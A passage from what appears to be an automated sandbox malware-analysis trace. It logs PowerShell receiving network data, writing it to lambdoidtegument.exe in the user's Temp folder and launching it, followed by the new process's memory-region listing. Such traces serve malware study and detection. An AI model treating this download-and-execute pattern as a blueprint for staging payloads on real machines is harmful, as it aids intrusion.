nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.276] GetLastError () returned 0x0 [0056.277] WriteFile (in: hFile=0x388, lpBuffer=0x253e1d8*, nNumberOfBytesToWrite=0x3ac0, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253e1d8*, lpNumberOfBytesWritten=0x51cec40*=0x3ac0, lpOverlapped=0x0) returned 1 [0056.277] GetLastError () returned 0x0 [0056.277] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0056.277] GetLastError () returned 0x0 [0056.277] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x1104, lpOverlapped=0x0) returned 1 [0056.277] GetLastError () returned 0x0 [0056.277] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 30492 [0056.285] GetLastError () returned 0x0 [0056.285] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x771c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x771c, lpOverlapped=0x0) returned 1 [0056.285] GetLastError () returned 0x0 [0056.285] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 4356 [0056.286] GetLastError () returned 0x0 [0056.286] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x1104, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x1104, lpOverlapped=0x0) returned 1 [0056.286] GetLastError () returned 0x0 [0056.286] recv (in: s=0x4cc, buf=0x253d888, len=65536, flags=0 | out: buf=0x253d888*) returned 30492 [0056.469] GetLastError () returned 0x0 [0056.470] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x771c, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x771c, lpOverlapped=0x0) returned 1 [0056.470] GetLastError () returned 0x0 [0056.471] recv (in: s=0x4cc, buf=0x253d888, len=54850, flags=0 | out: buf=0x253d888*) returned 15972 [0056.471] GetLastError () returned 0x0 [0056.471] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x3e64, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x3e64, lpOverlapped=0x0) returned 1 [0056.471] GetLastError () returned 0x0 [0056.471] recv (in: s=0x4cc, buf=0x253d888, len=38878, flags=0 | out: buf=0x253d888*) returned 2904 [0056.471] GetLastError () returned 0x0 [0056.471] recv (in: s=0x4cc, buf=0x253d888, len=35974, flags=0 | out: buf=0x253d888*) returned 24684 [0056.477] GetLastError () returned 0x0 [0056.477] WriteFile (in: hFile=0x388, lpBuffer=0x254d93c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x254d93c*, lpNumberOfBytesWritten=0x51cec40*=0x1000, lpOverlapped=0x0) returned 1 [0056.477] GetLastError () returned 0x0 [0056.477] WriteFile (in: hFile=0x388, lpBuffer=0x253dd30*, nNumberOfBytesToWrite=0x5bc4, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253dd30*, lpNumberOfBytesWritten=0x51cec40*=0x5bc4, lpOverlapped=0x0) returned 1 [0056.478] GetLastError () returned 0x0 [0056.478] recv (in: s=0x4cc, buf=0x253d888, len=11290, flags=0 | out: buf=0x253d888*) returned 11290 [0056.659] GetLastError () returned 0x0 [0056.659] SetEvent (hEvent=0x3a8) returned 1 [0056.659] GetLastError () returned 0x0 [0056.659] WriteFile (in: hFile=0x388, lpBuffer=0x253d888*, nNumberOfBytesToWrite=0x2c1a, lpNumberOfBytesWritten=0x51cec40, lpOverlapped=0x0 | out: lpBuffer=0x253d888*, lpNumberOfBytesWritten=0x51cec40*=0x2c1a, lpOverlapped=0x0) returned 1 [0056.660] GetLastError () returned 0x0 [0056.660] CloseHandle (hObject=0x388) returned 1 [0056.662] GetLastError () returned 0x0 [0056.664] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce540, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0056.664] GetLastError () returned 0x0 [0056.664] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0056.664] GetLastError () returned 0x0 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.664] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), fInfoLevelId=0x0, lpFileInformation=0x25558d4 | out: lpFileInformation=0x25558d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3607670, ftCreationTime.dwHighDateTime=0x1d3799e, ftLastAccessTime.dwLowDateTime=0xa3607670, ftLastAccessTime.dwHighDateTime=0x1d3799e, ftLastWriteTime.dwLowDateTime=0xa47958b0, ftLastWriteTime.dwHighDateTime=0x1d3799e, nFileSizeHigh=0x0, nFileSizeLow=0x3a000)) returned 1 [0056.664] GetLastError () returned 0x0 [0056.664] SetErrorMode (uMode=0x1) returned 0x1 [0056.665] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce828, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0056.666] GetLastError () returned 0x0 [0056.666] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0056.666] GetLastError () returned 0x0 [0056.666] SetErrorMode (uMode=0x1) returned 0x1 [0056.666] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), fInfoLevelId=0x0, lpFileInformation=0x51cecd0 | out: lpFileInformation=0x51cecd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3607670, ftCreationTime.dwHighDateTime=0x1d3799e, ftLastAccessTime.dwLowDateTime=0xa3607670, ftLastAccessTime.dwHighDateTime=0x1d3799e, ftLastWriteTime.dwLowDateTime=0xa47958b0, ftLastWriteTime.dwHighDateTime=0x1d3799e, nFileSizeHigh=0x0, nFileSizeLow=0x3a000)) returned 1 [0056.666] GetLastError () returned 0x0 [0056.666] SetErrorMode (uMode=0x1) returned 0x1 [0056.666] GetLongPathNameW (in: lpszShortPath="C:\\Users\\BGC6U8~1\\", lpszLongPath=0x51ce7f0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\BGC6u8Oy yXGxkR\\") returned 0x19 [0056.667] GetLastError () returned 0x0 [0056.667] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x105, lpBuffer=0x51ce818, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x0) returned 0x40 [0056.667] GetLastError () returned 0x0 [0056.667] SetErrorMode (uMode=0x1) returned 0x1 [0056.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe"), fInfoLevelId=0x0, lpFileInformation=0x51cec98 | out: lpFileInformation=0x51cec98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3607670, ftCreationTime.dwHighDateTime=0x1d3799e, ftLastAccessTime.dwLowDateTime=0xa3607670, ftLastAccessTime.dwHighDateTime=0x1d3799e, ftLastWriteTime.dwLowDateTime=0xa47958b0, ftLastWriteTime.dwHighDateTime=0x1d3799e, nFileSizeHigh=0x0, nFileSizeLow=0x3a000)) returned 1 [0056.667] GetLastError () returned 0x0 [0056.667] SetErrorMode (uMode=0x1) returned 0x1 [0056.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.850] GetLastError () returned 0xcb [0056.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.882] GetLastError () returned 0xcb [0056.913] SHGetFileInfoA (in: pszPath="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwFileAttributes=0x0, psfi=0x399978, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x399978) returned 0x4004550 [0056.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0056.967] GetLastError () returned 0xcb [0056.968] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.968] GetLastError () returned 0x0 [0056.995] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0056.995] GetLastError () returned 0x0 [0057.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x399978, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.002] GetLastError () returned 0xcb [0057.004] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x51ceda8 | out: pNumArgs=0x51ceda8) returned 0x30ed08*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" [0057.005] GetLastError () returned 0x0 [0057.005] LocalFree (hMem=0x30ed08) returned 0x0 [0057.007] GetConsoleTitleW (in: lpConsoleTitle=0x399978, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0057.007] GetLastError () returned 0x0 [0057.010] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x399978*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x255ceb8 | out: lpCommandLine="\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", lpProcessInformation=0x255ceb8*(hProcess=0x4c8, hThread=0x388, dwProcessId=0xb84, dwThreadId=0xb88)) returned 1 [0057.012] GetLastError () returned 0x715 [0057.025] CloseHandle (hObject=0x388) returned 1 [0057.025] GetLastError () returned 0x715 [0057.025] SHGetFileInfoA (in: pszPath="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", dwFileAttributes=0x0, psfi=0x399978, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x399978) returned 0x4004550 [0057.028] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0057.028] GetLastError () returned 0x0 [0057.028] CloseHandle (hObject=0x4c8) returned 1 [0057.028] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x38c) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x384) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x3a0) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x36c) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x31c) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x390) returned 1 [0057.030] GetLastError () returned 0x0 [0057.030] SetEvent (hEvent=0x2f8) returned 1 [0057.030] GetLastError () returned 0x0 [0057.031] SetEvent (hEvent=0x2fc) returned 1 [0057.031] GetLastError () returned 0x0 [0057.031] SetEvent (hEvent=0x32c) returned 1 [0057.031] GetLastError () returned 0x0 [0057.031] CoUninitialize () Thread: id = 61 os_tid = 0xb7c Thread: id = 62 os_tid = 0xb80 [0055.056] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0055.059] ResetEvent (hEvent=0x3a8) returned 1 [0055.059] GetLastError () returned 0x0 Thread: id = 64 os_tid = 0xb8c [0057.068] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0057.092] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.122] VirtualQuery (in: lpAddress=0x5e5e120, lpBuffer=0x5e5f120, dwLength=0x1c | out: lpBuffer=0x5e5f120*(BaseAddress=0x5e5e000, AllocationBase=0x54d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.122] VirtualQuery (in: lpAddress=0x5e5e23c, lpBuffer=0x5e5f23c, dwLength=0x1c | out: lpBuffer=0x5e5f23c*(BaseAddress=0x5e5e000, AllocationBase=0x54d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.123] SetEvent (hEvent=0x4c8) returned 1 [0057.123] GetLastError () returned 0x0 [0057.123] SetEvent (hEvent=0x388) returned 1 [0057.123] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4ec) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4c8) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x388) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x504) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4f8) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x4fc) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x500) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] SetEvent (hEvent=0x508) returned 1 [0057.124] GetLastError () returned 0x0 [0057.124] CoUninitialize () Process: id = "6" image_name = "lambdoidtegument.exe" filename = "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe" page_root = "0x7f1e66a0" os_pid = "0xb84" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb44" cmd_line = "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1004 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1005 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1006 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1007 start_va = 0x400000 end_va = 0x43afff entry_point = 0x400000 region_type = mapped_file name = "lambdoidtegument.exe" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe") Region: id = 1008 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1009 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1010 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1011 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1012 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1013 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1014 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1015 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1016 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1017 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\System32\\msvbvm60.dll" (normalized: "c:\\windows\\system32\\msvbvm60.dll") Region: id = 1018 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1019 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1020 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1021 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1022 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1023 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1024 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1025 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1026 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1027 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1028 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1029 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1030 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1031 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1032 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1033 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1034 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1035 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1036 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1037 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1038 start_va = 0x1200000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1039 start_va = 0x1310000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 1040 start_va = 0x1710000 end_va = 0x19defff entry_point = 0x1710000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1041 start_va = 0x550000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1042 start_va = 0x19e0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1043 start_va = 0x390000 end_va = 0x3ebfff entry_point = 0x390000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1044 start_va = 0x390000 end_va = 0x3ebfff entry_point = 0x390000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1045 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1046 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1047 start_va = 0x19e0000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1048 start_va = 0x1b60000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 1049 start_va = 0x1200000 end_va = 0x12defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1050 start_va = 0x1300000 end_va = 0x130ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1051 start_va = 0x1ba0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1052 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1054 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1056 start_va = 0x1cc0000 end_va = 0x20bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cc0000" filename = "" Region: id = 1057 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1058 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1059 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1060 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1061 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1062 start_va = 0x3a0000 end_va = 0x3dbfff entry_point = 0x3a0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1063 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1064 start_va = 0x19e0000 end_va = 0x1a5ffff entry_point = 0x19e0000 region_type = mapped_file name = "~dff8ff715eb6fd8eb1.tmp" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DFF8FF715EB6FD8EB1.TMP" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dff8ff715eb6fd8eb1.tmp") Region: id = 1065 start_va = 0x1ac0000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 1066 start_va = 0x1ba0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1067 start_va = 0x1cb0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1068 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1069 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1070 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1071 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: 